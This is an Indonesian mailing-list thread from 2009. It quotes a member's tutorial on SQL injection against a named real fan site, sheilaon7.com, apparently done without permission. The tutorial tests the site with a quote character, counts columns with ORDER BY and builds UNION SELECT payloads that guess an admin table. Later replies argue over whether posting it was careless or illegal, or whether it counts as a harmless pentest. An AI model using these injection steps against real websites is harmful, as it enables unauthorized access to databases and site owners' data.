betul sekali apa yang kawan sinichi katakan bukanya pihak admin www.sheilaon7.com gusar atau resah kalau gak ditest gimana kita tau keaman situs kita
salam the jakartas2000 ________________________________ From: Sinichi <punk_ski...@yahoo.co.id> To: yogyafree-perjuangan@yahoogroups.com Sent: Monday, June 15, 2009 10:51:12 PM Subject:Bls: [YF] [SHARE] SQLI @ www.sheilaon7.com Waduh2.. Sory kalau ikutan nimbrung, Maksudnya ini postingan di milis atau dimana ni? Kalau di milis Mas Arya Dwisatya tidak punya hak akses untuk itu, silahkan konfirmasikan ke momod kalau memang melanggar. Biar nanti momod yang menghapus. Tapi kalau yang dimaksud postingan di blog saya sarankan mas Arya membaca kembali TOS dari blogger yang di pakai mas Arya. Apakah itu melanggar untuk di publish atau tidak. (Kalau saya pribadi tidak usah di hapus, karena itu bisa jadi pembelajaran buat kita semua tentang SQLi) Seharusnya pihak admin dari site www.sheilaon7. com berterima kasih dengan mas Arya karena sudah mendapat penetration test gratis, sehingga bisa segera di perbaiki bug tersebut. (baca dari milis mas Arya juga sudah konfirmasi ke adminnya). Setelah saya cek, ternyata bugnya juga sudah di perbaiki. Jadi kesimpulan saya mas Arya melakukan pent test tanpa merusak, saya anggap itu sebuah sikap yang patut kita hormati. Maaf kalau dari saya ada yang tidak sependapat atau kurang berkenan, saya hanya ikut beropini saja. Ayo majukan terus TI Indonesia Sinichi ________________________________ Dari: Hadi Kusworo <jumbl...@yahoo. com> Kepada: yogyafree-perjuanga n...@yahoogroups. com Terkirim: Senin, 15 Juni, 2009 20:54:23 Topik:Re: [YF] [SHARE] SQLI @ www.sheilaon7. com Wah kebetulan gw sheila gank nih, buat mas Arya Dwisatya, saya minta anda segera menghapus postingan anda mengenai SQLI pada web sheilaon7(dot) com (yang lain gw ga peduli). jika terjadi kerusakan pada site tersebut maka saya anggap itu tanggung jawab anda dan saya akan melaporkan anda ke polisi. thx --- In yogyafree-perjuanga n...@yahoogroups. com, "Muh. Fitrah" <fitrah_funky@ ...> wrote: > > aq setuju bang, kita disini bukan buat pamer... > apa lagi di xcode bukan tujuannya untuk merusak suatu sistem atau website. > kyknya file peraturan belum dibaca > > > Peraturan Umum Yogyafree 2008-2009 : > > > > -Tindakan Hacking tanpa ijin pemilik situs tidak diperbolehkan > > -Tindakan Hacking hanya diperbolehkan jika sudah ijin pemilik situs untuk > penetration test agar aplikasi > > web lebih aman dan lebih baik > > -Tindakan Carding tidak diperbolehkan sama sekali termasuk bagi-bagi CC > > -Tindakan Penyebaran virus / mallware tidak diperbolehkan jika untuk > kepentingan negatif tetapi diperbolehkan > > untuk mengetahui cara kerjanya sehingga diharapkan bisa memproteksi komputer > kita dari serangan virus. > > -Tindakan merusak sistem / masuk tanpa ijin ke sistem orang lain tidak > diperbolehkan jika tanpa ijin pemiliknya > > Jika ada segala tindakan hack, carding, penyebaran virus, perusakan dan > semua yang negatif adalah di luar Yogyafree, semua administrator, > moderator dan founder tidak bertanggung jawab sama sekali terhadap isi > segala media di Yogyafree (Web, CD, Forum, Milis, dst) karena kami > menyediakan isi tersebut semata-mata bertujuan untuk membantu para > developer, programmer dst untuk mengetahui cara kerja melakukan > penetrasi ke sistem target dengan ijin pemiliknya sehingga diharapkan > nantinya dapat membuat sistem keamanan system komputer yang lebih baik. > > > > > --- Pada Ming, 7/6/09, Andy Rz <andy...@... > menulis: > > Dari: Andy Rz <andy...@... > > Topik: Bls: [YF] [SHARE] SQLI @ www.sheilaon7. com > Kepada: yogyafree-perjuanga n...@yahoogroups. com > Tanggal: Minggu, 7 Juni, 2009, 2:45 AM > > > > > > > > > > > > > > > > > > Sorry om, tindakan loe ceroboh. Kalo ada fans Sheilla disini terus > dilaporin kepolisi, bisa ditangkap loe. Kalo loe nemuin bugs baiknya, loe > laporin ke adminnya. Kayanya itu lebih bermanfaat. Jangan di expose. > Maaf.. kalo kata2 gwe kurang berkenan.. > > > > > > Dari: Arya Dwisatya <a.dwisatya@ yahoo. com> > Kepada: yogyafree-perjuanga n...@yahoogroups. com > Terkirim: Minggu, 7 > Juni, 2009 11:45:16 > Judul: [YF] [SHARE] SQLI @ www.sheilaon7. com > > > > > > > > > > > > > Dilihat dari judulnya udah tau kan siapa targetnya? > Kalo gitu kita mulai sekarang, > > target: > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=302 > > Kita cek bugnya, kita tambahkan ' pada akhir url > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=302' > > beberapa saat kemudian.... . > (Syntax error or access violation) > wah, tanda tanda bisa di inject nih, lanjut, > > ok, > berhubung errornya "Syntax error or access violation" jadi, kita bisa > inject web tersebut dengan cara yang hampir sama dengan cara iject php, > khususnya php versi 4. > > Sekarang kita cari julah kolomnya. > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 1 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 2 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 3 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 4 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 5 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 6 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 7 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 8 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 26 <--tidak ada error > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=9 > order by 27 <-- ada error > > nah, sekarang kita tahu kan? kalo > web tersebut mempunyai 26 kolom, sekarang kita cari nomor yang > bermasalah, kita gunakan perintah union seperti biasa, namun pada saat > yang sama, kita juga harus menebak nama tablenya agar nomor yang > bermasalah muncul. > > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=302% 20union% 20all%20select% 201,2,3,4, 5,6,7,8,9, > 10,11,12, 13,14,15, 16,17,18, 19,20,21, 22,23,24, 25,26 > jreng..... yang muncul malah error, bukan nomor yang bermasalah > Query input must contain at least one table or query. > > sekarang kita coba tebak nama kolomnya, > http://www.sheilaon 7.com/index. cfm?fuseaction= home.general& section=about_ > sheila_on_ 7_band&id=302% 20union% 20all%20select% 201,2,3,4, 5,6,7,8,9, > 10,11,12, 13,14,15, 16,17,18, 19,20,21, 22,23,24, 25,26%20from% 20admin > <---keluar error > > > untuk kelanjutannya, silahkan kunjungi xyber-breaker. blogspot. com > maaf ya, > sekalian promosi, hehehe. > > > Berselancar lebih cepat. > Internet Explorer 8 yang dioptimalkan untuk Yahoo! otomatis membuka 2 > halaman favorit Anda setiap kali Anda membuka browser.Dapatkan IE8 di sini! > (Gratis) > > > > > > > > > Lebih bersih, Lebih baik, Lebih cepat - Yahoo! Mail: Kini tanpa iklan. > Rasakan bedanya! > > > > > > > > > > > > > > > > > > > > > > > > > > Lebih aman saat online. Upgrade ke Internet Explorer 8 baru dan lebih > cepat yang dioptimalkan untuk Yahoo! agar Anda merasa lebih aman. Gratis. > Dapatkan IE8 di sini! > http://downloads. yahoo.com/ id/internetexplo rer/ > ________________________________ Lebih bersih, Lebih baik, Lebih cepat - Yahoo! Mail: Kini tanpa iklan. Rasakan bedanya!